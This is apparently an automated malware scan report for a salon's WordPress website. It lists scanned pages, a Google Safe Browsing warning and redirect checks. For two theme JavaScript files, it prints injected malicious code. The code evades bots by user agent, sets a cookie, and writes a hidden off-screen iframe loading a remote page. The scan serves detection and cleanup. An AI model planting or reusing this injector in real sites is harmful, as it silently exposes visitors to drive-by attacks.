Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ihbsalon.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.ihbsalon.com/ | 200 OK Content-Length: 26134 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://www.ihbsalon.com//ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 14 Jan 2015 15:47:00 GMT Pragma: no-cache Location: http://www.ihbsalon.com/ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js/ Server: Apache/2.4.9 (Unix) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Powered-By: PHP/5.2.17 | clean |
http://www.ihbsalon.com/ajax.googleapis.com/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 14 Jan 2015 15:47:02 GMT Pragma: no-cache Location: http://www.ihbsalon.com/?s= ajax.googleapis.com ajax libs jqueryui 1.10.3 jquery-ui.min.js Server: Apache/2.4.9 (Unix) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Powered-By: PHP/5.2.17 | clean |
http://www.ihbsalon.com/?s= ajax.googleapis.com ajax libs jqueryui 1.10.3 jquery-ui.min.js | 200 OK Content-Length: 17950 Content-Type: text/html | clean |
http://www.ihbsalon.com/wp-content/plugins/job-manager/js/display.js?ver=0.7.20 | 200 OK Content-Length: 3226 Content-Type: text/javascript | clean |
http://www.ihbsalon.com/wp-content/themes/ihbsalon/js/jquery.easing.1.3.js | 200 OK Content-Length: 1136 Content-Type: text/javascript | clean |
http://www.ihbsalon.com/wp-content/themes/ihbsalon/js/swfobject/swfobject.js | 200 OK Content-Length: 11223 Content-Type: text/javascript | clean |
http://www.ihbsalon.com/wp-content/themes/ihbsalon/js/jquery.colorbox-min.js | 200 OK Content-Length: 2947 Content-Type: text/javascript | clean |
http://www.ihbsalon.com/wp-content/themes/ihbsalon/js/gl/galleria.js | 200 OK Content-Length: 976 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("akelbriston19ure")===undefined);if(!d()&&c){document.write('<iframe width="110" height="130" style="position:absolute;margin-top:-1001px;" src="http://animesiteindo.tk/intservers17.html"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+a.toUTCString()}})(); Antivirus reports:
| ||
http://www.ihbsalon.com/wp-content/themes/ihbsalon/js/lightbox.js | 200 OK Content-Length: 5877 Content-Type: text/javascript | clean |
http://www.ihbsalon.com/wp-content/themes/ihbsalon/js/functions.js | 200 OK Content-Length: 1945 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki Antivirus reports:
| ||
http://www.ihbsalon.com/wp-content/plugins/dynamic-to-top/js/libs/jquery.easing.js?ver=1.3 | 200 OK Content-Length: 5642 Content-Type: text/javascript | clean |
http://www.ihbsalon.com/wp-content/plugins/dynamic-to-top/js/dynamic.to.top.min.js?ver=3.4.2 | 200 OK Content-Length: 3070 Content-Type: text/javascript | clean |
http://www.ihbsalon.com/health-and-spa/ | 200 OK Content-Length: 19253 Content-Type: text/html | clean |
http://www.ihbsalon.com/wp-content/themes/ihbsalon/js/grace.js.php | 200 OK Content-Length: 14789 Content-Type: text/html | clean |
http://www.ihbsalon.com/wp-content/themes/ihbsalon/js/' + slideInfo[slideIndex][11] + ' | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 14 Jan 2015 15:47:11 GMT Pragma: no-cache Location: http://www.ihbsalon.com/?s= wp-content themes ihbsalon js \'%20+%20slideInfo[slideIndex][11]%20+%20\' Server: Apache/2.4.9 (Unix) Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Powered-By: PHP/5.2.17 | clean |
http://www.ihbsalon.com/?s= wp-content themes ihbsalon js \'%20+%20slideinfo[slideindex][11]%20+%20\' | 200 OK Content-Length: 18047 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ihbsalon.com
Result:
GET / HTTP/1.1
Host: ihbsalon.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ihbsalon.com
Referer: http://www.google.com/search?q=ihbsalon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ihbsalon.com
Referer: http://www.google.com/search?q=ihbsalon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.